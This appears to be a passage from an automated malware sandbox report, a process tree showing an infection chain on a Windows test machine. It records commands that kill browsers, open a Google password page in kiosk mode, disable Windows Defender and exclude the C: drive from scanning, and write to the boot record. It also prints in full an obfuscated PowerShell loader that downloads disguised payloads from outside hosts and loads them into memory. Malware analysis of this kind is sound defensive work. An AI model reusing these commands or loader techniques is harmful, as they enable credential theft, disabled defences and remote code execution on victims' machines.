                                    PID:5340
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM opera.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5572
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM brave.exe /T
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4268
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                    4⤵
                                      PID:3624
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                        5⤵
                                        • Drops desktop.ini file(s)
                                        • Checks processor information in registry
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3676
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {a952068d-9510-4bcd-9c94-46efb3b66223} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                          6⤵
                                            PID:3064
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2500 -initialChannelId {6b1f5de1-e041-4f5c-bd1d-db031405fc0b} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                            6⤵
                                              PID:2404
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3696 -prefsLen 25164 -prefMapHandle 3700 -prefMapSize 270279 -jsInitHandle 3704 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3712 -initialChannelId {5a791da8-c76c-4df5-90bb-5bc1cdb8a738} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                              6⤵
                                              • Checks processor information in registry
                                              PID:5076
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3864 -prefsLen 27276 -prefMapHandle 3868 -prefMapSize 270279 -ipcHandle 3960 -initialChannelId {a260c262-3a90-460b-b5d1-628d82a2fac3} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                              6⤵
                                                PID:2132
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2752 -prefsLen 34775 -prefMapHandle 4400 -prefMapSize 270279 -jsInitHandle 4384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4404 -initialChannelId {e311ed03-c238-439b-aea7-93ec6e5fce2e} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                6⤵
                                                • Checks processor information in registry
                                                PID:5272
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5064 -prefsLen 35012 -prefMapHandle 5060 -prefMapSize 270279 -ipcHandle 4524 -initialChannelId {945d1f31-5f83-44a8-9581-924a2aa996d0} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                6⤵
                                                • Checks processor information in registry
                                                PID:2844
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5340 -prefsLen 32952 -prefMapHandle 5344 -prefMapSize 270279 -jsInitHandle 5348 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5356 -initialChannelId {f7d9337a-f11e-4da6-bc97-bcb37f43366f} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                6⤵
                                                • Checks processor information in registry
                                                PID:3012
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5528 -prefsLen 32952 -prefMapHandle 4728 -prefMapSize 270279 -jsInitHandle 4720 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4940 -initialChannelId {d255564f-93ee-4ed4-b51b-e93b37874cec} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                6⤵
                                                • Checks processor information in registry
                                                PID:4920
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2940 -prefsLen 32952 -prefMapHandle 5672 -prefMapSize 270279 -jsInitHandle 5676 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5684 -initialChannelId {dcfbbd69-1ad1-4cb1-a875-5ad0c097fba6} -parentPid 3676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                6⤵
                                                • Checks processor information in registry
                                                PID:1664
                                        • C:\Users\Admin\AppData\Local\Temp\10339430101\191a939724.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10339430101\191a939724.exe"
                                          3⤵
                                          • Modifies Windows Defender DisableAntiSpyware settings
                                          • Modifies Windows Defender Real-time Protection settings
                                          • Modifies Windows Defender TamperProtection settings
                                          • Modifies Windows Defender notification settings
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Windows security modification
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4932
                                        • C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe"
                                          3⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          PID:6452
                                          • C:\Windows\SysWOW64\CMD.exe
                                            "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:6760
                                            • C:\Windows\SysWOW64\tasklist.exe
                                              tasklist
                                              5⤵
                                              • Enumerates processes with tasklist
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6608
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr /I "opssvc wrsa"
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6620
                                            • C:\Windows\SysWOW64\tasklist.exe
                                              tasklist
                                              5⤵
                                              • Enumerates processes with tasklist
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1016
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2260
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c md 267978
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:7068
                                            • C:\Windows\SysWOW64\extrac32.exe
                                              extrac32 /Y /E Spanish.vss
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5124
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr /V "East" Removed
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6992
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:7048
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2148
                                            • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                              Exam.com j
                                              5⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:5060
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /d y /t 5
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5680
                                        • C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: MapViewOfSection
                                          PID:6304
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                            4⤵
                                              PID:6640
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                5⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6788
                                            • C:\Windows\system32\svchost.exe
                                              "C:\Windows\system32\svchost.exe"
                                              4⤵
                                              • Downloads MZ/PE file
                                              • Adds Run key to start application
                                              PID:6652
                                              • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                5⤵
                                                • Sets service image path in registry
                                                • Executes dropped EXE
                                                • Suspicious behavior: LoadsDriver
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1500
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Remove-MpPreference -ExclusionPath C:\
                                                  6⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4816
                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                5⤵
                                                • Deletes itself
                                                • Executes dropped EXE
                                                PID:1676
                                                • C:\Users\Admin\AppData\Local\Temp\{bb7043ab-93bc-44da-89a5-c6c44cd023fb}\4cb7183e.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\{bb7043ab-93bc-44da-89a5-c6c44cd023fb}\4cb7183e.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                  • System Location Discovery: System Language Discovery
                                                  PID:8676
                                                  • C:\Users\Admin\AppData\Local\Temp\{91d7ebf7-e0cc-469e-9b4b-d4d9f10f92f2}\7d51708e.exe
                                                    C:/Users/Admin/AppData/Local/Temp/{91d7ebf7-e0cc-469e-9b4b-d4d9f10f92f2}/\7d51708e.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                    7⤵
                                                    • Drops file in Drivers directory
                                                    • Sets service image path in registry
                                                    • Executes dropped EXE
                                                    • Impair Defenses: Safe Mode Boot
                                                    • Loads dropped DLL
                                                    • Adds Run key to start application
                                                    • Checks for any installed AV software in registry
                                                    • Enumerates connected drives
                                                    • Writes to the Master Boot Record (MBR)
                                                    • Checks for VirtualBox DLLs, possible anti-VM trick
                                                    • Event Triggered Execution: Netsh Helper DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • NTFS ADS
                                                    • Suspicious behavior: LoadsDriver
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:9288
                                          • C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe"
                                            3⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            PID:4476
                                            • C:\Windows\SysWOW64\CMD.exe
                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6612
                                          • C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:7028
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c 67e3b7493caeb.vbs
                                              4⤵
                                              • Checks computer location settings
                                              • Modifies registry class
                                              PID:6780
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e3b7493caeb.vbs"
                                                5⤵
                                                • Checks computer location settings
                                                PID:6176
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBp@GY@bwBw@GQ@Z@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5544
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ifopddd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                    7⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2480
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                      8⤵
                                                        PID:7940
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:7952
                                            • C:\Users\Admin\AppData\Local\Temp\10339480101\e72cb8dfb4.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10339480101\e72cb8dfb4.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              PID:7784
                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10339480101\e72cb8dfb4.exe"
                                                4⤵
                                                • Downloads MZ/PE file
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:8060
